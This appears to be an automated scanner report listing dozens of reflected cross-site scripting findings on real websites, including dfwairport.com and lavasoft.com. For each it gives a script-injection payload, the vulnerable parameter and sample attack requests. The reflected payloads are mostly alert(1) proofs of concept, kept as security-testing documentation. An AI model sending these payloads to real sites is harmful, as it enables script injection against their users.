This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2dcf2<script>alert(1)</script>518a91a0a09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15b4a"-alert(1)-"3ff7ce65817 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 10e5b<script>alert(1)</script>6e3a323e6bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b47"-alert(1)-"d9497451a76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4389"-alert(1)-"e8fbdc2b414 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba971<script>alert(1)</script>4b785aea6d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fcedb<script>alert(1)</script>4c88d6f4c58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d050e"-alert(1)-"337cc64e2aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8937a"-alert(1)-"f049c6759df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7397c<script>alert(1)</script>03437b72aad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 404 Not Found Date: Wed, 07 Sep 2011 12:26:44 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 1413 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>api/nai/status7397c<script>alert(1)</script>03437b72aad?nocache=0.8315244</strong> ...[SNIP]...
1.142. http://www.dfwairport.com/globalentry/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dfwairport.com
Path:
/globalentry/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0de"><script>alert(1)</script>6b250513e00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /globalentry/?fc0de"><script>alert(1)</script>6b250513e00=1 HTTP/1.1 Host: www.dfwairport.com Proxy-Connection: keep-alive Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.143. http://www.dfwairport.com/guide/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dfwairport.com
Path:
/guide/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a4f"><script>alert(1)</script>3f28e5e818a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b22e'><script>alert(1)</script>8a5fb0d26dc was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?domain=4b22e'><script>alert(1)</script>8a5fb0d26dc HTTP/1.1 Host: www.lavasoft.com Proxy-Connection: keep-alive Referer: http://allthingsd.com/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<meta name='description' c ...[SNIP]... <a class='login first' href='/mylavasoft/login?destination=/?domain=4b22e'><script>alert(1)</script>8a5fb0d26dc'> ...[SNIP]...
1.145. http://www.lavasoft.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lavasoft.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bcb9c'><script>alert(1)</script>0c3711a31a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bcb9c'><script>alert(1)</script>0c3711a31a5=1 HTTP/1.1 Host: www.lavasoft.com Proxy-Connection: keep-alive Referer: http://allthingsd.com/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2aba5'><script>alert(1)</script>c2049abbabc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70b40'><script>alert(1)</script>b2096c0958d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fd00'><script>alert(1)</script>18f3446347d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90845'><script>alert(1)</script>d6c36072837 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a3fd'><script>alert(1)</script>2503f3b109a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cb92c'><script>alert(1)</script>e031a800279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0fcf'><script>alert(1)</script>1bfc0782f6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71a0f'><script>alert(1)</script>8a0b8342e83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2b62'><script>alert(1)</script>1aabc7e254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 502bc'><script>alert(1)</script>e34a2f2501e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48fb6'><script>alert(1)</script>1d5f7324bb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b696'><script>alert(1)</script>1a92eb01410 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85071'><script>alert(1)</script>dbb72c49636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faae5'><script>alert(1)</script>8317c119fa0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9f0b3'><script>alert(1)</script>f688db7b221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1dcf'><script>alert(1)</script>61823a841a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fbd0'><script>alert(1)</script>fa4d70e4e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81900'><script>alert(1)</script>5e10506606b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ac96e'><script>alert(1)</script>945c7d74830 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.165. http://www.lavasoft.com/img/gradient_black_dgrey_v_100.png [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.lavasoft.com
Path:
/img/gradient_black_dgrey_v_100.png
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 54fe6'><script>alert(1)</script>460b86e196a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b048'><script>alert(1)</script>28f692a0d15a4a8ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f69f'><script>alert(1)</script>6a1505323de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f879'><script>alert(1)</script>e4fcb70e95babf13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6354'><script>alert(1)</script>745e8b4b2d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b4d'style%3d'x%3aexpression(alert(1))'ca66c4680d2948ae4 was submitted in the destination parameter. This input was echoed as b7b4d'style='x:expression(alert(1))'ca66c4680d2948ae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the destination request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a019'style%3d'x%3aexpression(alert(1))'38cb7c2a7e7 was submitted in the destination parameter. This input was echoed as 4a019'style='x:expression(alert(1))'38cb7c2a7e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 160d5'><script>alert(1)</script>ce9b102c404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a6729'><script>alert(1)</script>398b22b03e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7375'><script>alert(1)</script>8ec033ef7c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea828'><script>alert(1)</script>1d6fa491fe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cbb9c'><script>alert(1)</script>9be3172317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea8fd'><script>alert(1)</script>60b6de0a8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc93e'><script>alert(1)</script>c92b17aa9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a80a'><script>alert(1)</script>d08343746d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9459e'><script>alert(1)</script>60483082767 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 82edb'><script>alert(1)</script>3e9ba5b1bc6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 450c0'><script>alert(1)</script>e48049f0f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55c3a'><script>alert(1)</script>4cd751fd905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8f4b'><script>alert(1)</script>3e472aa4d6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f909c'><script>alert(1)</script>f2d938a6d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1a65'><script>alert(1)</script>278b2720f83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45a38'><script>alert(1)</script>0315653ed5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3908'><script>alert(1)</script>9a992f154c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57b9a'><script>alert(1)</script>e31a7e2f8d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9b8e3'><script>alert(1)</script>b2e7545d254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b77a'><script>alert(1)</script>236573ae363 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3037e'><script>alert(1)</script>5801b21d286 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78f8b'><script>alert(1)</script>621f0eb0c19 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9147f'><script>alert(1)</script>280704c335d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 53b79'><script>alert(1)</script>c3abaa8a500 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c90a'><script>alert(1)</script>63d1c6ba5a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d73a9'><script>alert(1)</script>7f6206abc9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e425'><script>alert(1)</script>4fd9962d7ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8570e'><script>alert(1)</script>ce7e18db5c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63e8b'><script>alert(1)</script>c48b6ddd3ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19bd4'><script>alert(1)</script>08090652a8b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4100d'><script>alert(1)</script>f6e60007ec8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab356'><script>alert(1)</script>4322317a08b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7668'><script>alert(1)</script>dd59b0cd693 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 11aec'><script>alert(1)</script>9250b34dab5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e9be'><script>alert(1)</script>939406975b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 806ea'><script>alert(1)</script>eb3bcf32647 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f333f'><script>alert(1)</script>8c4d44176a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4b7b'><script>alert(1)</script>d12d2c52918 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7ba62'><script>alert(1)</script>b152347a317 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faf8b'><script>alert(1)</script>aac192f3126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e50cb'><script>alert(1)</script>a488ec66a24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a545a'><script>alert(1)</script>d88e24eab1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49b0c'><script>alert(1)</script>7c44f2e80ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b64a'><script>alert(1)</script>f62241c0c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 183e2'><script>alert(1)</script>bc10062b1a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b616b'><script>alert(1)</script>b774bbd66e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
